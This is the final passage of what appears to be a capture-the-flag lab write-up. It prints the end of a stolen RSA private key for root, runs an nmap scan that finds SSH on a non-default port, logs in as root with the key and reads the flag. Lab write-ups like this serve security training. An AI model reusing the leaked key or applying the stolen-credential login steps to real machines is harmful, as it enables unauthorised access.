lFfPcFn9AWxmY5BX61M0XGwvGUm7e51Bu6ZDGQIBIwKCAQEAuRVxWDuodiH0Q0d5
lGtx9Yw40Vk8g5ac/I999439pMq69HcbQyNwDpdJl5EAK7dW3mmtXlB9a+j2zJRX
KKo97kBmKzVqLWtPp6KVEtfYJYPYgsnmyy6cBT1iYMnFDHUSLNt2nFEv3rA0wV3U
dZ6LZnKn5FEdMGsS73sr6sYuEZEUnLJMCWtzDV2UOPJeugDKASjmkFQXFdzeyCtx
tzZv230bwW9qH8WvXA2ITPtAXuZG0YbAn2t9Swu/FEXsQCAiRz8SBVcPj36aqSUP
Yv+L3uyWMrgBkiIUk+52GB5IHFnBCBz2W9AXXs38mcDOx7uF/gp2VGMu4ozz4IcR
+KKuiwKBgQD8aTCKL7PpOoWz4OQDE8Rk6uqG5AKRLo325+vnjdzY8NhjHpQ226hT
luqaop78FcAwoWoXEUcwjzJ9GHVuzvChimSt5zzLH186WAYOxtqn7R8gKQugwQQ6
hZq5YZKoVPHoMAlzWBzl/be2f5pSPuB7I9GJO6s7GiKMlNYtpIjhoQKBgQDT79cx
wrJunhEFfz/ySUBLQ5j2m1lX5Y38+a3rhNp6C0E5izapnIxDUPdIgaiSs3PvdCff
tBHR04tq671WOtE0OIN3wlMyPlcEQsm3Yhu65qmLmTgoho0A046i+g4KHBNQHH3y
gf1jtQQIR9dcOuyomCuIoHIBIGcCyD8YkwreeQKBgHqZffn56avL98xl6xdwAE5G
N2YW+e6+1z1pVVM2RrKDnE1mn8LfuCiZwmhdna2kKiY/xdCwnuuzRGilet4MvgVR
2SFEbfxCcBUGLtP6L7CmX5NHIueuNUD/EKMvZH2lmhGw7qW9FVnEYIvXlBlRvX2j
rurid72e+taRb1f/da9rAoGBAKN+gW+HkPY/bDdwyu4bQDoPk0HljhCbJGQRESNm
fKdKgsX9rdNM4Ts+dZ5VZMjw1cdZmxpJFQ+UkB9IJFh2hCD4ZWsDn0QENH+hPIYn
HLTAkWuwtksl977PFkM17ZLFM3hQfmqeyslCf3QaKcrOXsszj0wkACzBOYXNrQRU
LPTDAoGAFWNcNeQCSK2/KyBJWHpVB5bcBuv6bVBG9+j53wR0JFUEYdINbNs+EFqx
3bB1k2M+XVyPRLCNhyPb8qYo2kwTixDpscF3GyjAGl7oF2EtnDrMpwdGdZ3Oj4FW
Ck3bvaKJ8me9pW+E9N8j1kE7cdghTduH0sPMMm5V1s9tvKF14WY=
-----END RSA PRIVATE KEY-----

We now have the id_rsa for the root user of machine 172.23.0.4. Perform an nmap scan to find the SSH service, which is running on a non-default port:

root@kali ~/t/hadoop# nmap -p- 172.23.0.4 --min-rate 1000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-12 05:34 EST
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.35% done; ETC: 05:35 (0:00:02 remaining)
Nmap scan report for 172.23.0.4
Host is up (0.40s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE
2122/tcp open  caupc-remote

Nmap done: 1 IP address (1 host up) scanned in 72.71 seconds

The SSH service is running on port 2122. Save the stolen key as id_rsa and restrict its permissions with chmod 700 so SSH will accept it.

Log in as the root user:

ssh -i id_rsa root@172.23.0.4 -p 2122

We finally have SSH access as the root user on the master node. Read the flag:

-bash-4.1# cat flag10.txt 
THM{This.Just.Keeps.Getting.Sadder.And.Sadder}

Thank you for reading 👍
